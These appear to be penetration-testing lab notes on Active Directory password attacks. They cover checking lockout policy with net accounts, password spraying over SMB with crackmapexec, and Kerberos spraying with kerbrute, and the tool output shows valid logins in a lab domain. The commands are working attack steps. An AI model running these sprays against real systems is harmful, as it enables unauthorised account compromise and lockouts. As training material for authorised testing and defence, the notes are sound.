Password Attacks / Brute Force

Passwords attacks are also a viable choice in the context of AD to obtain user credentials. In this section, we'll explore various AD password attacks.

Brute Force Attacks

When performing a brute force or word list authentication attack, we must be aware of account lockouts. Too many failed logins may block the account for further attacks and possible alert system administrators.

Review Account Lockout Policies

To learn more about account lockouts we can review the domain's account policy. Use the PowerShell window and execute net accounts to obtain the account policy:

PS C:\Users\jeff> net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.

The Lockout threshold parameter indicates the limit of login attempts before lockout. The Lockout observation parameter which indicates the number of minutes that the lockout will last before being able to make another login attempt.

Password Spraying Attack Using crackmapexec and SMB

Try to grab password policy with crackmapexec

crackmapexec smb 10.10.10.10 --pass-pol
crackmapexec smb 10.10.10.10 --pass-pol -u '' -p '' # Uses a null user for authentication

Spraying with crackmapexec

kali@kali:~$ cat users.txt
dave
jen
pete

kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB         192.168.50.75   445    CLIENT75         [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.50.75   445    CLIENT75         [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE 
SMB         192.168.50.75   445    CLIENT75         [+] corp.com\jen:Nexus123!
SMB         192.168.50.75   445    CLIENT75         [+] corp.com\pete:Nexus123!

kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com                       
SMB         192.168.50.75   445    CLIENT75         [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.50.75   445    CLIENT75         [+] corp.com\dave:Flowers1 (Pwn3d!)

If crackmapexec adds Pwn3d! to the output, it indicates that a user with administrative privileges on the target system has been found.

Password Spraying Attack Against Kerberos TGT

We can using kinit to obtain and cache a Kerberos TGT. We will need to use a username and password to accomplish this. If this credentials are valid, we'll obtain a TGT. The advantages of this technique is that it only uses two UDP frames to determine whether the password is valid as it sends only an AS-REQ and examines the response.

We can use the kerbrute program to perform this attack. To use password spraying ,we use the passwordspray command along with a list of usernames and passwords to spray.

PS C:\Tools> type .\usernames.txt
pete
dave
jen

PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop

2022/09/06 20:30:48 >  Using KDC(s):
2022/09/06 20:30:48 >   dc1.corp.com:88
2022/09/06 20:30:48 >  [+] VALID LOGIN:  jen@corp.com:Nexus123!
2022/09/06 20:30:48 >  [+] VALID LOGIN:  pete@corp.com:Nexus123!
2022/09/06 20:30:48 >  Done! Tested 3 logins (2 successes) in 0.041 seconds

If you receive a network error, make sure that the encoding of usernames.txt is ANSI. You can use Notepad's Save As functionality to change the encoding.